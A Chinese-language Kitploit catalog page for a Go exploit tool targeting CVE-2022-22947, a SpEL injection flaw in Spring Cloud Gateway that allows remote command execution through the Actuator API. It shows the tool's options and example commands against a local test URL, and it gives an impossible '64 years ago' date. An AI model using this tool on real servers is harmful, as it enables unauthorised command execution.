Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
cve-2022-22947 — 基于Go的CVE-2022-22947漏洞利用工具,针对Spring Cloud Gateway中的SpEL注入漏洞,可通过Actuator API实现远程命令执行。 | Kitploit
工具/GitHubGitHub/darkb1rd/cve-2022-22947
漏洞分析漏洞利用Web应用程序漏洞利用渗透测试命令与控制
GitHubdarkb1rd/cve-2022-22947

cve-2022-22947

基于Go的CVE-2022-22947漏洞利用工具,针对Spring Cloud Gateway中的SpEL注入漏洞,可通过Actuator API实现远程命令执行。

查看仓库
64年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

cve-2022-22947

Spring Cloud Gateway 是Spring中的一个API网关。其3.1.0及3.0.6版本(包含)以前存在一处SpEL表达式注入漏洞,当攻击者可以访问Actuator API的情况下,将可以利用该漏洞执行任意命令。

使用:

root@kitploit:~
➜ ./cve-2022-22947 -h
Usage of cve-2022-22947:
  -c string
    	Execute command, Example: whoami (default "id")
  -d	Delete route.
  -r string
    	New route name
  -u string
    	Target Url, Example: http://127.0.0.1:8080

# example

[>] Usage: ./CVE-2022-22947 -u http://127.0.0.1:8080 -c whoami -r exploit.
[>] Usage: ./CVE-2022-22947 -u http://127.0.0.1:8080 -r exploit -d

遇到的问题:https://darkb1rd.github.io/2022/03/07/yuque/cve-2022-22947%20%E5%B0%8F%E7%82%B9/

下载工具